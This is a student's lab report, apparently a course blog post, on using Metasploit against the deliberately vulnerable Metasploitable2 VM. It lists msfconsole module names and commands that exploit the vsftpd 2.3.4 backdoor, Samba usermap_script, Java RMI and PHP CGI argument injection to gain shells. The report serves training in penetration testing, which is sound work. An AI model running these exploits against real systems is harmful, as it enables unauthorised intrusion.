20222425 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

本周学习内容:本周我学习的章节是Meatsploit渗透测试技术。在本章的学习中,首先,我了解了Metasploit,这是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode。其实在之前的免杀技术的那一章我们就使用过这个工具,当时就对这个工具的功能深深震撼到了。在课堂上老师讲了MST基本框架,讲了外部安全工具,插件,扩展脚本,基础库文件,模块等,讲了许多种模块以及他们的使用方法和功能,在之后的实验课以及实践课上啊,深刻的接触了这门技术,并成功实践渗透了几个漏洞,这章的学习让我印象深刻,让我真正感受到了这门课程在现实生活中的应用。

2.实验过程

本实践目标是掌握metasploit的用法。
指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成下面实验内容。
我的靶机IP是192.168.35.145

(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)

②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。

③选做:也可以扫系统版本、漏洞等。

(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
利用步骤:
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
set RHOST 192.168.35.145 设置要攻击的机器IP(靶机IP)
exploit/run 开始攻击
利用成功
执行uname –a、 pwd、 id等命令 验证

(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
利用步骤:
use exploit/multi/samba/usermap_script 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit 开始攻击
利用成功 执行uname–a验证

(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
操作步骤:
首先查看1099端口是否打开。
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST (靶机IP)
exploit/run
sessions -i 1
shell (进入meterpreter时,使用whoami验证下)

(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
在kali中执行msfconsole,启动metasploit
msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit/run 开始攻击

3.问题及解决方案

  • 问题1:set payload失败
  • 问题1解决方案:多设置几次

4.学习感悟、思考等

在实践中加深了对Metasploit这个工具的理解,对它的操作也越来越熟悉了,在生活中我们也要做好防护措施,避免受到攻击。

posted @ 2024-11-18 20:09  20222425  阅读(10)  评论(0编辑  收藏  举报